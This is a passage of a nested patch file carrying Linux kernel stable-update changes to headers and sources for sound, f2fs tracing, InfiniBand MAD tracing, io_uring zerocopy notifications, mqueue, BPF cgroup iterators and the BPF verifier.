+ 	u16			num_socks;		/* elements in socks */
+ 	u16			num_closed_socks;	/* closed elements in socks */
++	u16			incoming_cpu;
+ 	/* The last synq overflow event timestamp of this
+ 	 * reuse->socks[] group.
+ 	 */
+@@ -58,5 +59,6 @@ static inline bool reuseport_has_conns(struct sock *sk)
+ }
+ 
+ void reuseport_has_conns_set(struct sock *sk);
++void reuseport_update_incoming_cpu(struct sock *sk, int val);
+ 
+ #endif  /* _SOCK_REUSEPORT_H */
+diff --git a/include/net/tcp.h b/include/net/tcp.h
+index 14d45661a84d8..5b70b241ce71b 100644
+--- a/include/net/tcp.h
++++ b/include/net/tcp.h
+@@ -2291,8 +2291,8 @@ int tcp_bpf_update_proto(struct sock *sk, struct sk_psock *psock, bool restore);
+ void tcp_bpf_clone(const struct sock *sk, struct sock *newsk);
+ #endif /* CONFIG_BPF_SYSCALL */
+ 
+-int tcp_bpf_sendmsg_redir(struct sock *sk, struct sk_msg *msg, u32 bytes,
+-			  int flags);
++int tcp_bpf_sendmsg_redir(struct sock *sk, bool ingress,
++			  struct sk_msg *msg, u32 bytes, int flags);
+ #endif /* CONFIG_NET_SOCK_MSG */
+ 
+ #if !defined(CONFIG_BPF_SYSCALL) || !defined(CONFIG_NET_SOCK_MSG)
+diff --git a/include/sound/hda_codec.h b/include/sound/hda_codec.h
+index 25ec8c181688d..eba23daf2c290 100644
+--- a/include/sound/hda_codec.h
++++ b/include/sound/hda_codec.h
+@@ -258,6 +258,7 @@ struct hda_codec {
+ 	unsigned int link_down_at_suspend:1; /* link down at runtime suspend */
+ 	unsigned int relaxed_resume:1;	/* don't resume forcibly for jack */
+ 	unsigned int forced_resume:1; /* forced resume for jack */
++	unsigned int no_stream_clean_at_suspend:1; /* do not clean streams at suspend */
+ 
+ #ifdef CONFIG_PM
+ 	unsigned long power_on_acct;
+diff --git a/include/sound/pcm.h b/include/sound/pcm.h
+index 7b1a022910e8e..27040b472a4f6 100644
+--- a/include/sound/pcm.h
++++ b/include/sound/pcm.h
+@@ -106,24 +106,24 @@ struct snd_pcm_ops {
+ #define SNDRV_PCM_POS_XRUN		((snd_pcm_uframes_t)-1)
+ 
+ /* If you change this don't forget to change rates[] table in pcm_native.c */
+-#define SNDRV_PCM_RATE_5512		(1<<0)		/* 5512Hz */
+-#define SNDRV_PCM_RATE_8000		(1<<1)		/* 8000Hz */
+-#define SNDRV_PCM_RATE_11025		(1<<2)		/* 11025Hz */
+-#define SNDRV_PCM_RATE_16000		(1<<3)		/* 16000Hz */
+-#define SNDRV_PCM_RATE_22050		(1<<4)		/* 22050Hz */
+-#define SNDRV_PCM_RATE_32000		(1<<5)		/* 32000Hz */
+-#define SNDRV_PCM_RATE_44100		(1<<6)		/* 44100Hz */
+-#define SNDRV_PCM_RATE_48000		(1<<7)		/* 48000Hz */
+-#define SNDRV_PCM_RATE_64000		(1<<8)		/* 64000Hz */
+-#define SNDRV_PCM_RATE_88200		(1<<9)		/* 88200Hz */
+-#define SNDRV_PCM_RATE_96000		(1<<10)		/* 96000Hz */
+-#define SNDRV_PCM_RATE_176400		(1<<11)		/* 176400Hz */
+-#define SNDRV_PCM_RATE_192000		(1<<12)		/* 192000Hz */
+-#define SNDRV_PCM_RATE_352800		(1<<13)		/* 352800Hz */
+-#define SNDRV_PCM_RATE_384000		(1<<14)		/* 384000Hz */
+-
+-#define SNDRV_PCM_RATE_CONTINUOUS	(1<<30)		/* continuous range */
+-#define SNDRV_PCM_RATE_KNOT		(1<<31)		/* supports more non-continuos rates */
++#define SNDRV_PCM_RATE_5512		(1U<<0)		/* 5512Hz */
++#define SNDRV_PCM_RATE_8000		(1U<<1)		/* 8000Hz */
++#define SNDRV_PCM_RATE_11025		(1U<<2)		/* 11025Hz */
++#define SNDRV_PCM_RATE_16000		(1U<<3)		/* 16000Hz */
++#define SNDRV_PCM_RATE_22050		(1U<<4)		/* 22050Hz */
++#define SNDRV_PCM_RATE_32000		(1U<<5)		/* 32000Hz */
++#define SNDRV_PCM_RATE_44100		(1U<<6)		/* 44100Hz */
++#define SNDRV_PCM_RATE_48000		(1U<<7)		/* 48000Hz */
++#define SNDRV_PCM_RATE_64000		(1U<<8)		/* 64000Hz */
++#define SNDRV_PCM_RATE_88200		(1U<<9)		/* 88200Hz */
++#define SNDRV_PCM_RATE_96000		(1U<<10)	/* 96000Hz */
++#define SNDRV_PCM_RATE_176400		(1U<<11)	/* 176400Hz */
++#define SNDRV_PCM_RATE_192000		(1U<<12)	/* 192000Hz */
++#define SNDRV_PCM_RATE_352800		(1U<<13)	/* 352800Hz */
++#define SNDRV_PCM_RATE_384000		(1U<<14)	/* 384000Hz */
++
++#define SNDRV_PCM_RATE_CONTINUOUS	(1U<<30)	/* continuous range */
++#define SNDRV_PCM_RATE_KNOT		(1U<<31)	/* supports more non-continuos rates */
+ 
+ #define SNDRV_PCM_RATE_8000_44100	(SNDRV_PCM_RATE_8000|SNDRV_PCM_RATE_11025|\
+ 					 SNDRV_PCM_RATE_16000|SNDRV_PCM_RATE_22050|\
+diff --git a/include/trace/events/f2fs.h b/include/trace/events/f2fs.h
+index c6b372401c278..ff57e7f9914cc 100644
+--- a/include/trace/events/f2fs.h
++++ b/include/trace/events/f2fs.h
+@@ -322,7 +322,7 @@ TRACE_EVENT(f2fs_unlink_enter,
+ 		__field(ino_t,	ino)
+ 		__field(loff_t,	size)
+ 		__field(blkcnt_t, blocks)
+-		__field(const char *,	name)
++		__string(name,  dentry->d_name.name)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -330,7 +330,7 @@ TRACE_EVENT(f2fs_unlink_enter,
+ 		__entry->ino	= dir->i_ino;
+ 		__entry->size	= dir->i_size;
+ 		__entry->blocks	= dir->i_blocks;
+-		__entry->name	= dentry->d_name.name;
++		__assign_str(name, dentry->d_name.name);
+ 	),
+ 
+ 	TP_printk("dev = (%d,%d), dir ino = %lu, i_size = %lld, "
+@@ -338,7 +338,7 @@ TRACE_EVENT(f2fs_unlink_enter,
+ 		show_dev_ino(__entry),
+ 		__entry->size,
+ 		(unsigned long long)__entry->blocks,
+-		__entry->name)
++		__get_str(name))
+ );
+ 
+ DEFINE_EVENT(f2fs__inode_exit, f2fs_unlink_exit,
+@@ -940,25 +940,29 @@ TRACE_EVENT(f2fs_direct_IO_enter,
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(ino_t,	ino)
+-		__field(struct kiocb *,	iocb)
++		__field(loff_t,	ki_pos)
++		__field(int,	ki_flags)
++		__field(u16,	ki_ioprio)
+ 		__field(unsigned long,	len)
+ 		__field(int,	rw)
+ 	),
+ 
+ 	TP_fast_assign(
+-		__entry->dev	= inode->i_sb->s_dev;
+-		__entry->ino	= inode->i_ino;
+-		__entry->iocb	= iocb;
+-		__entry->len	= len;
+-		__entry->rw	= rw;
++		__entry->dev		= inode->i_sb->s_dev;
++		__entry->ino		= inode->i_ino;
++		__entry->ki_pos		= iocb->ki_pos;
++		__entry->ki_flags	= iocb->ki_flags;
++		__entry->ki_ioprio	= iocb->ki_ioprio;
++		__entry->len		= len;
++		__entry->rw		= rw;
+ 	),
+ 
+ 	TP_printk("dev = (%d,%d), ino = %lu pos = %lld len = %lu ki_flags = %x ki_ioprio = %x rw = %d",
+ 		show_dev_ino(__entry),
+-		__entry->iocb->ki_pos,
++		__entry->ki_pos,
+ 		__entry->len,
+-		__entry->iocb->ki_flags,
+-		__entry->iocb->ki_ioprio,
++		__entry->ki_flags,
++		__entry->ki_ioprio,
+ 		__entry->rw)
+ );
+ 
+@@ -1407,19 +1411,19 @@ TRACE_EVENT(f2fs_write_checkpoint,
+ 	TP_STRUCT__entry(
+ 		__field(dev_t,	dev)
+ 		__field(int,	reason)
+-		__field(char *,	msg)
++		__string(dest_msg, msg)
+ 	),
+ 
+ 	TP_fast_assign(
+ 		__entry->dev		= sb->s_dev;
+ 		__entry->reason		= reason;
+-		__entry->msg		= msg;
++		__assign_str(dest_msg, msg);
+ 	),
+ 
+ 	TP_printk("dev = (%d,%d), checkpoint for %s, state = %s",
+ 		show_dev(__entry->dev),
+ 		show_cpreason(__entry->reason),
+-		__entry->msg)
++		__get_str(dest_msg))
+ );
+ 
+ DECLARE_EVENT_CLASS(f2fs_discard,
+diff --git a/include/trace/events/ib_mad.h b/include/trace/events/ib_mad.h
+index 59363a083ecb9..d92691c78cff6 100644
+--- a/include/trace/events/ib_mad.h
++++ b/include/trace/events/ib_mad.h
+@@ -49,7 +49,6 @@ DECLARE_EVENT_CLASS(ib_mad_send_template,
+ 		__field(int,            retries_left)
+ 		__field(int,            max_retries)
+ 		__field(int,            retry)
+-		__field(u16,            pkey)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -89,7 +88,7 @@ DECLARE_EVENT_CLASS(ib_mad_send_template,
+ 		  "hdr : base_ver 0x%x class 0x%x class_ver 0x%x " \
+ 		  "method 0x%x status 0x%x class_specific 0x%x tid 0x%llx " \
+ 		  "attr_id 0x%x attr_mod 0x%x  => dlid 0x%08x sl %d "\
+-		  "pkey 0x%x rpqn 0x%x rqpkey 0x%x",
++		  "rpqn 0x%x rqpkey 0x%x",
+ 		__entry->dev_index, __entry->port_num, __entry->qp_num,
+ 		__entry->agent_priv, be64_to_cpu(__entry->wrtid),
+ 		__entry->retries_left, __entry->max_retries,
+@@ -100,7 +99,7 @@ DECLARE_EVENT_CLASS(ib_mad_send_template,
+ 		be16_to_cpu(__entry->class_specific),
+ 		be64_to_cpu(__entry->tid), be16_to_cpu(__entry->attr_id),
+ 		be32_to_cpu(__entry->attr_mod),
+-		be32_to_cpu(__entry->dlid), __entry->sl, __entry->pkey,
++		be32_to_cpu(__entry->dlid), __entry->sl,
+ 		__entry->rqpn, __entry->rqkey
+ 	)
+ );
+@@ -204,7 +203,6 @@ TRACE_EVENT(ib_mad_recv_done_handler,
+ 		__field(u16,            wc_status)
+ 		__field(u32,            slid)
+ 		__field(u32,            dev_index)
+-		__field(u16,            pkey)
+ 	),
+ 
+ 	TP_fast_assign(
+@@ -224,9 +222,6 @@ TRACE_EVENT(ib_mad_recv_done_handler,
+ 		__entry->slid = wc->slid;
+ 		__entry->src_qp = wc->src_qp;
+ 		__entry->sl = wc->sl;
+-		ib_query_pkey(qp_info->port_priv->device,
+-			      qp_info->port_priv->port_num,
+-			      wc->pkey_index, &__entry->pkey);
+ 		__entry->wc_status = wc->status;
+ 	),
+ 
+@@ -234,7 +229,7 @@ TRACE_EVENT(ib_mad_recv_done_handler,
+ 		  "base_ver 0x%02x class 0x%02x class_ver 0x%02x " \
+ 		  "method 0x%02x status 0x%04x class_specific 0x%04x " \
+ 		  "tid 0x%016llx attr_id 0x%04x attr_mod 0x%08x " \
+-		  "slid 0x%08x src QP%d, sl %d pkey 0x%04x",
++		  "slid 0x%08x src QP%d, sl %d",
+ 		__entry->dev_index, __entry->port_num, __entry->qp_num,
+ 		__entry->wc_status,
+ 		__entry->length,
+@@ -244,7 +239,7 @@ TRACE_EVENT(ib_mad_recv_done_handler,
+ 		be16_to_cpu(__entry->class_specific),
+ 		be64_to_cpu(__entry->tid), be16_to_cpu(__entry->attr_id),
+ 		be32_to_cpu(__entry->attr_mod),
+-		__entry->slid, __entry->src_qp, __entry->sl, __entry->pkey
++		__entry->slid, __entry->src_qp, __entry->sl
+ 	)
+ );
+ 
+diff --git a/include/uapi/linux/idxd.h b/include/uapi/linux/idxd.h
+index 2b9e7feba3f32..1d553bedbdb51 100644
+--- a/include/uapi/linux/idxd.h
++++ b/include/uapi/linux/idxd.h
+@@ -295,7 +295,7 @@ struct dsa_completion_record {
+ 		};
+ 
+ 		uint32_t	delta_rec_size;
+-		uint32_t	crc_val;
++		uint64_t	crc_val;
+ 
+ 		/* DIF check & strip */
+ 		struct {
+diff --git a/include/uapi/linux/io_uring.h b/include/uapi/linux/io_uring.h
+index 2df3225b562fa..9d4c4078e8d00 100644
+--- a/include/uapi/linux/io_uring.h
++++ b/include/uapi/linux/io_uring.h
+@@ -296,10 +296,28 @@ enum io_uring_op {
+  *
+  * IORING_RECVSEND_FIXED_BUF	Use registered buffers, the index is stored in
+  *				the buf_index field.
++ *
++ * IORING_SEND_ZC_REPORT_USAGE
++ *				If set, SEND[MSG]_ZC should report
++ *				the zerocopy usage in cqe.res
++ *				for the IORING_CQE_F_NOTIF cqe.
++ *				0 is reported if zerocopy was actually possible.
++ *				IORING_NOTIF_USAGE_ZC_COPIED if data was copied
++ *				(at least partially).
+  */
+ #define IORING_RECVSEND_POLL_FIRST	(1U << 0)
+ #define IORING_RECV_MULTISHOT		(1U << 1)
+ #define IORING_RECVSEND_FIXED_BUF	(1U << 2)
++#define IORING_SEND_ZC_REPORT_USAGE	(1U << 3)
++
++/*
++ * cqe.res for IORING_CQE_F_NOTIF if
++ * IORING_SEND_ZC_REPORT_USAGE was requested
++ *
++ * It should be treated as a flag, all other
++ * bits of cqe.res should be treated as reserved!
++ */
++#define IORING_NOTIF_USAGE_ZC_COPIED    (1U << 31)
+ 
+ /*
+  * accept flags stored in sqe->ioprio
+diff --git a/include/uapi/linux/swab.h b/include/uapi/linux/swab.h
+index 0723a9cce747c..01717181339eb 100644
+--- a/include/uapi/linux/swab.h
++++ b/include/uapi/linux/swab.h
+@@ -3,7 +3,7 @@
+ #define _UAPI_LINUX_SWAB_H
+ 
+ #include <linux/types.h>
+-#include <linux/compiler.h>
++#include <linux/stddef.h>
+ #include <asm/bitsperlong.h>
+ #include <asm/swab.h>
+ 
+diff --git a/include/uapi/rdma/hns-abi.h b/include/uapi/rdma/hns-abi.h
+index f6fde06db4b4e..745790ce3c261 100644
+--- a/include/uapi/rdma/hns-abi.h
++++ b/include/uapi/rdma/hns-abi.h
+@@ -85,11 +85,26 @@ struct hns_roce_ib_create_qp_resp {
+ 	__aligned_u64 dwqe_mmap_key;
+ };
+ 
++enum {
++	HNS_ROCE_EXSGE_FLAGS = 1 << 0,
++};
++
++enum {
++	HNS_ROCE_RSP_EXSGE_FLAGS = 1 << 0,
++};
++
+ struct hns_roce_ib_alloc_ucontext_resp {
+ 	__u32	qp_tab_size;
+ 	__u32	cqe_size;
+ 	__u32	srq_tab_size;
+ 	__u32	reserved;
++	__u32	config;
++	__u32	max_inline_data;
++};
++
++struct hns_roce_ib_alloc_ucontext {
++	__u32 config;
++	__u32 reserved;
+ };
+ 
+ struct hns_roce_ib_alloc_pd_resp {
+diff --git a/include/uapi/sound/asequencer.h b/include/uapi/sound/asequencer.h
+index 6d4a2c60808dd..00d2703e8fca5 100644
+--- a/include/uapi/sound/asequencer.h
++++ b/include/uapi/sound/asequencer.h
+@@ -328,10 +328,10 @@ typedef int __bitwise snd_seq_client_type_t;
+ #define	KERNEL_CLIENT	((__force snd_seq_client_type_t) 2)
+                         
+ 	/* event filter flags */
+-#define SNDRV_SEQ_FILTER_BROADCAST	(1<<0)	/* accept broadcast messages */
+-#define SNDRV_SEQ_FILTER_MULTICAST	(1<<1)	/* accept multicast messages */
+-#define SNDRV_SEQ_FILTER_BOUNCE		(1<<2)	/* accept bounce event in error */
+-#define SNDRV_SEQ_FILTER_USE_EVENT	(1<<31)	/* use event filter */
++#define SNDRV_SEQ_FILTER_BROADCAST	(1U<<0)	/* accept broadcast messages */
++#define SNDRV_SEQ_FILTER_MULTICAST	(1U<<1)	/* accept multicast messages */
++#define SNDRV_SEQ_FILTER_BOUNCE		(1U<<2)	/* accept bounce event in error */
++#define SNDRV_SEQ_FILTER_USE_EVENT	(1U<<31)	/* use event filter */
+ 
+ struct snd_seq_client_info {
+ 	int client;			/* client number to inquire */
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index 61cd7ffd0f6aa..17771cb3c3330 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -1757,7 +1757,7 @@ static int io_issue_sqe(struct io_kiocb *req, unsigned int issue_flags)
+ 		return ret;
+ 
+ 	/* If the op doesn't have a file, we're not polling for it */
+-	if ((req->ctx->flags & IORING_SETUP_IOPOLL) && req->file)
++	if ((req->ctx->flags & IORING_SETUP_IOPOLL) && def->iopoll_queue)
+ 		io_iopoll_req_issued(req, issue_flags);
+ 
+ 	return 0;
+diff --git a/io_uring/msg_ring.c b/io_uring/msg_ring.c
+index 90d2fc6fd80e4..a49ccab262d53 100644
+--- a/io_uring/msg_ring.c
++++ b/io_uring/msg_ring.c
+@@ -164,12 +164,10 @@ int io_msg_ring(struct io_kiocb *req, unsigned int issue_flags)
+ 	}
+ 
+ done:
++	if (ret == -EAGAIN)
++		return -EAGAIN;
+ 	if (ret < 0)
+ 		req_set_fail(req);
+ 	io_req_set_res(req, ret, 0);
+-	/* put file to avoid an attempt to IOPOLL the req */
+-	if (!(req->flags & REQ_F_FIXED_FILE))
+-		io_put_file(req->file);
+-	req->file = NULL;
+ 	return IOU_OK;
+ }
+diff --git a/io_uring/net.c b/io_uring/net.c
+index ab83da7e80f04..bdd2b4e370b35 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -479,6 +479,7 @@ static int __io_compat_recvmsg_copy_hdr(struct io_kiocb *req,
+ 	if (req->flags & REQ_F_BUFFER_SELECT) {
+ 		compat_ssize_t clen;
+ 
++		iomsg->free_iov = NULL;
+ 		if (msg.msg_iovlen == 0) {
+ 			sr->len = 0;
+ 		} else if (msg.msg_iovlen > 1) {
+@@ -805,10 +806,10 @@ retry_multishot:
+ 		goto retry_multishot;
+ 
+ 	if (mshot_finished) {
+-		io_netmsg_recycle(req, issue_flags);
+ 		/* fast path, check for non-NULL to avoid function call */
+ 		if (kmsg->free_iov)
+ 			kfree(kmsg->free_iov);
++		io_netmsg_recycle(req, issue_flags);
+ 		req->flags &= ~REQ_F_NEED_CLEANUP;
+ 	}
+ 
+@@ -937,7 +938,8 @@ int io_send_zc_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 
+ 	zc->flags = READ_ONCE(sqe->ioprio);
+ 	if (zc->flags & ~(IORING_RECVSEND_POLL_FIRST |
+-			  IORING_RECVSEND_FIXED_BUF))
++			  IORING_RECVSEND_FIXED_BUF |
++			  IORING_SEND_ZC_REPORT_USAGE))
+ 		return -EINVAL;
+ 	notif = zc->notif = io_alloc_notif(ctx);
+ 	if (!notif)
+@@ -955,6 +957,9 @@ int io_send_zc_prep(struct io_kiocb *req, const struct io_uring_sqe *sqe)
+ 		req->imu = READ_ONCE(ctx->user_bufs[idx]);
+ 		io_req_set_rsrc_node(notif, ctx, 0);
+ 	}
++	if (zc->flags & IORING_SEND_ZC_REPORT_USAGE) {
++		io_notif_to_data(notif)->zc_report = true;
++	}
+ 
+ 	if (req->opcode == IORING_OP_SEND_ZC) {
+ 		if (READ_ONCE(sqe->__pad3[0]))
+diff --git a/io_uring/notif.c b/io_uring/notif.c
+index e37c6569d82e8..4bfef10161fa0 100644
+--- a/io_uring/notif.c
++++ b/io_uring/notif.c
+@@ -18,6 +18,10 @@ static void __io_notif_complete_tw(struct io_kiocb *notif, bool *locked)
+ 		__io_unaccount_mem(ctx->user, nd->account_pages);
+ 		nd->account_pages = 0;
+ 	}
++
++	if (nd->zc_report && (nd->zc_copied || !nd->zc_used))
++		notif->cqe.res |= IORING_NOTIF_USAGE_ZC_COPIED;
++
+ 	io_req_task_complete(notif, locked);
+ }
+ 
+@@ -28,6 +32,13 @@ static void io_uring_tx_zerocopy_callback(struct sk_buff *skb,
+ 	struct io_notif_data *nd = container_of(uarg, struct io_notif_data, uarg);
+ 	struct io_kiocb *notif = cmd_to_io_kiocb(nd);
+ 
++	if (nd->zc_report) {
++		if (success && !nd->zc_used && skb)
++			WRITE_ONCE(nd->zc_used, true);
++		else if (!success && !nd->zc_copied)
++			WRITE_ONCE(nd->zc_copied, true);
++	}
++
+ 	if (refcount_dec_and_test(&uarg->refcnt)) {
+ 		notif->io_task_work.func = __io_notif_complete_tw;
+ 		io_req_task_work_add(notif);
+@@ -55,6 +66,7 @@ struct io_kiocb *io_alloc_notif(struct io_ring_ctx *ctx)
+ 	nd->account_pages = 0;
+ 	nd->uarg.flags = SKBFL_ZEROCOPY_FRAG | SKBFL_DONT_ORPHAN;
+ 	nd->uarg.callback = io_uring_tx_zerocopy_callback;
++	nd->zc_report = nd->zc_used = nd->zc_copied = false;
+ 	refcount_set(&nd->uarg.refcnt, 1);
+ 	return notif;
+ }
+diff --git a/io_uring/notif.h b/io_uring/notif.h
+index 5b4d710c8ca54..4ae696273c781 100644
+--- a/io_uring/notif.h
++++ b/io_uring/notif.h
+@@ -13,6 +13,9 @@ struct io_notif_data {
+ 	struct file		*file;
+ 	struct ubuf_info	uarg;
+ 	unsigned long		account_pages;
++	bool			zc_report;
++	bool			zc_used;
++	bool			zc_copied;
+ };
+ 
+ void io_notif_flush(struct io_kiocb *notif);
+diff --git a/io_uring/opdef.c b/io_uring/opdef.c
+index 83dc0f9ad3b2f..04dd2c983fce4 100644
+--- a/io_uring/opdef.c
++++ b/io_uring/opdef.c
+@@ -63,6 +63,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "READV",
+ 		.prep			= io_prep_rw,
+@@ -80,6 +81,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "WRITEV",
+ 		.prep			= io_prep_rw,
+@@ -103,6 +105,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "READ_FIXED",
+ 		.prep			= io_prep_rw,
+@@ -118,6 +121,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "WRITE_FIXED",
+ 		.prep			= io_prep_rw,
+@@ -277,6 +281,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "READ",
+ 		.prep			= io_prep_rw,
+@@ -292,6 +297,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.audit_skip		= 1,
+ 		.ioprio			= 1,
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= sizeof(struct io_async_rw),
+ 		.name			= "WRITE",
+ 		.prep			= io_prep_rw,
+@@ -481,6 +487,7 @@ const struct io_op_def io_op_defs[] = {
+ 		.plug			= 1,
+ 		.name			= "URING_CMD",
+ 		.iopoll			= 1,
++		.iopoll_queue		= 1,
+ 		.async_size		= uring_cmd_pdu_size(1),
+ 		.prep			= io_uring_cmd_prep,
+ 		.issue			= io_uring_cmd,
+diff --git a/io_uring/opdef.h b/io_uring/opdef.h
+index 3efe06d25473a..df7e13d9bfba7 100644
+--- a/io_uring/opdef.h
++++ b/io_uring/opdef.h
+@@ -25,6 +25,8 @@ struct io_op_def {
+ 	unsigned		ioprio : 1;
+ 	/* supports iopoll */
+ 	unsigned		iopoll : 1;
++	/* have to be put into the iopoll list */
++	unsigned		iopoll_queue : 1;
+ 	/* opcode specific path will handle ->async_data allocation if needed */
+ 	unsigned		manual_alloc : 1;
+ 	/* size of async data needed, if any */
+diff --git a/io_uring/timeout.c b/io_uring/timeout.c
+index e8a8c20994805..06200fe73a044 100644
+--- a/io_uring/timeout.c
++++ b/io_uring/timeout.c
+@@ -72,10 +72,12 @@ static bool io_kill_timeout(struct io_kiocb *req, int status)
+ __cold void io_flush_timeouts(struct io_ring_ctx *ctx)
+ 	__must_hold(&ctx->completion_lock)
+ {
+-	u32 seq = ctx->cached_cq_tail - atomic_read(&ctx->cq_timeouts);
++	u32 seq;
+ 	struct io_timeout *timeout, *tmp;
+ 
+ 	spin_lock_irq(&ctx->timeout_lock);
++	seq = ctx->cached_cq_tail - atomic_read(&ctx->cq_timeouts);
++
+ 	list_for_each_entry_safe(timeout, tmp, &ctx->timeout_list, list) {
+ 		struct io_kiocb *req = cmd_to_io_kiocb(timeout);
+ 		u32 events_needed, events_got;
+diff --git a/ipc/mqueue.c b/ipc/mqueue.c
+index 467a194b8a2ec..d09aa1c1e3e65 100644
+--- a/ipc/mqueue.c
++++ b/ipc/mqueue.c
+@@ -1726,7 +1726,8 @@ static int __init init_mqueue_fs(void)
+ 
+ 	if (!setup_mq_sysctls(&init_ipc_ns)) {
+ 		pr_warn("sysctl registration failed\n");
+-		return -ENOMEM;
++		error = -ENOMEM;
++		goto out_kmem;
+ 	}
+ 
+ 	error = register_filesystem(&mqueue_fs_type);
+@@ -1744,8 +1745,9 @@ static int __init init_mqueue_fs(void)
+ out_filesystem:
+ 	unregister_filesystem(&mqueue_fs_type);
+ out_sysctl:
+-	kmem_cache_destroy(mqueue_inode_cachep);
+ 	retire_mq_sysctls(&init_ipc_ns);
++out_kmem:
++	kmem_cache_destroy(mqueue_inode_cachep);
+ 	return error;
+ }
+ 
+diff --git a/kernel/Makefile b/kernel/Makefile
+index d754e0be1176d..ebc692242b68b 100644
+--- a/kernel/Makefile
++++ b/kernel/Makefile
+@@ -41,9 +41,6 @@ UBSAN_SANITIZE_kcov.o := n
+ KMSAN_SANITIZE_kcov.o := n
+ CFLAGS_kcov.o := $(call cc-option, -fno-conserve-stack) -fno-stack-protector
+ 
+-# Don't instrument error handlers
+-CFLAGS_REMOVE_cfi.o := $(CC_FLAGS_CFI)
+-
+ obj-y += sched/
+ obj-y += locking/
+ obj-y += power/
+diff --git a/kernel/acct.c b/kernel/acct.c
+index 62200d799b9b0..034a26daabb2e 100644
+--- a/kernel/acct.c
++++ b/kernel/acct.c
+@@ -350,6 +350,8 @@ static comp_t encode_comp_t(unsigned long value)
+ 		exp++;
+ 	}
+ 
++	if (exp > (((comp_t) ~0U) >> MANTSIZE))
++		return (comp_t) ~0U;
+ 	/*
+ 	 * Clean it up and polish it off.
+ 	 */
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index 35c07afac924e..efdbba2a0230e 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -4481,6 +4481,11 @@ static int btf_func_proto_check(struct btf_verifier_env *env,
+ 			break;
+ 		}
+ 
++		if (btf_type_is_resolve_source_only(arg_type)) {
++			btf_verifier_log_type(env, t, "Invalid arg#%u", i + 1);
++			return -EINVAL;
++		}
++
+ 		if (args[i].name_off &&
+ 		    (!btf_name_offset_valid(btf, args[i].name_off) ||
+ 		     !btf_name_valid_identifier(btf, args[i].name_off))) {
+diff --git a/kernel/bpf/cgroup_iter.c b/kernel/bpf/cgroup_iter.c
+index 9fcf09f2ef00f..c187a9e62bdbb 100644
+--- a/kernel/bpf/cgroup_iter.c
++++ b/kernel/bpf/cgroup_iter.c
+@@ -164,16 +164,30 @@ static int cgroup_iter_seq_init(void *priv, struct bpf_iter_aux_info *aux)
+ 	struct cgroup_iter_priv *p = (struct cgroup_iter_priv *)priv;
+ 	struct cgroup *cgrp = aux->cgroup.start;
+ 
++	/* bpf_iter_attach_cgroup() has already acquired an extra reference
++	 * for the start cgroup, but the reference may be released after
++	 * cgroup_iter_seq_init(), so acquire another reference for the
++	 * start cgroup.
++	 */
+ 	p->start_css = &cgrp->self;
++	css_get(p->start_css);
+ 	p->terminate = false;
+ 	p->visited_all = false;
+ 	p->order = aux->cgroup.order;
+ 	return 0;
+ }
+ 
++static void cgroup_iter_seq_fini(void *priv)
++{
++	struct cgroup_iter_priv *p = (struct cgroup_iter_priv *)priv;
++
++	css_put(p->start_css);
++}
++
+ static const struct bpf_iter_seq_info cgroup_iter_seq_info = {
+ 	.seq_ops		= &cgroup_iter_seq_ops,
+ 	.init_seq_private	= cgroup_iter_seq_init,
++	.fini_seq_private	= cgroup_iter_seq_fini,
+ 	.seq_priv_size		= sizeof(struct cgroup_iter_priv),
+ };
+ 
+diff --git a/kernel/bpf/syscall.c b/kernel/bpf/syscall.c
+index 7b373a5e861f4..439ed7e5a82b8 100644
+--- a/kernel/bpf/syscall.c
++++ b/kernel/bpf/syscall.c
+@@ -3504,9 +3504,9 @@ static int bpf_prog_attach(const union bpf_attr *attr)
+ 	case BPF_PROG_TYPE_LSM:
+ 		if (ptype == BPF_PROG_TYPE_LSM &&
+ 		    prog->expected_attach_type != BPF_LSM_CGROUP)
+-			return -EINVAL;
+-
+-		ret = cgroup_bpf_prog_attach(attr, ptype, prog);
++			ret = -EINVAL;
++		else
++			ret = cgroup_bpf_prog_attach(attr, ptype, prog);
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 264b3dc714cc4..242fe307032f1 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -1008,9 +1008,9 @@ static void *copy_array(void *dst, const void *src, size_t n, size_t size, gfp_t
+ 	if (unlikely(check_mul_overflow(n, size, &bytes)))
+ 		return NULL;
+ 
+-	if (ksize(dst) < bytes) {
++	if (ksize(dst) < ksize(src)) {
+ 		kfree(dst);
+-		dst = kmalloc_track_caller(bytes, flags);
++		dst = kmalloc_track_caller(kmalloc_size_roundup(bytes), flags);
+ 		if (!dst)
+ 			return NULL;
+ 	}
+@@ -1027,12 +1027,14 @@ out:
+  */
